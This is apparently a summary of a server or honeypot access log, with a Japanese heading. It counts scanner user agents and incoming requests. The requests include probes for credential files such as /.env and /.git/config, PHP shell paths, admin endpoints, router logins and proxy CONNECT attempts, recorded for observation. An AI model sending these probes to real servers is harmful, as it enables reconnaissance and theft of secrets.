1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3875.0 Safari/537.36`
35	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
4	`Mozilla/5.0 (compatible; Odin; https[:]//docs[.]getodin[.]com/)`
2	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`
1	`curl/8.1.2`
1	`python-requests/2.31.0`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
1		`E\b\x12\xe5\xc6\|;\xe8\xc1\x8b\xc8\x92\xd8\x82\x95\x1f`	f\xc7\xe7\xc4\x06K\xe7\x12\xf5q\xcb\x10\x8cx\x86q\x1b\xaa_\x9c\xae\xd8rC\xc2m^J\xb3N(\xb4\r\x9c\xbf\x82\x86R\x16\xc7\x87\x94A\xdc\x13\xc4\xc7\x80\x1c\xfc<.\x1c\xb9\xf6F\xae\xc3\x8cp`\xa5A\x83+\xfe\xb1C\x12pwKo[g\x9d\x9c\xd1n\x92~t\"c:\xac\xec\x11\xd7\x8fY\v#\xd31
4		`\x03`
2		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01`	\x01
28		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
1	CONNECT	`res[.]wx[.]qq[.]com:443`	HTTP/1.1
36	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
2	GET	`/HNAP1`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
2	GET	`/evox/about`	HTTP/1.1
10	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/nmaplowercheck1704235842`	HTTP/1.1
1	GET	`/nmaplowercheck1704265739`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/query?q=SHOW+DIAGNOSTICS`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/admin/cores?action=STATUS&wt=json`	HTTP/1.1
1	GET	`/solr/admin/info/system`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/v2/_catalog`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/phpunit.xml`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-content/plugins/media-library-assistant/readme.txt`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	POST	`/sdk`	HTTP/1.1
1	POST	`http[:]//51[.]15[.]117[.]46/conn_info.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0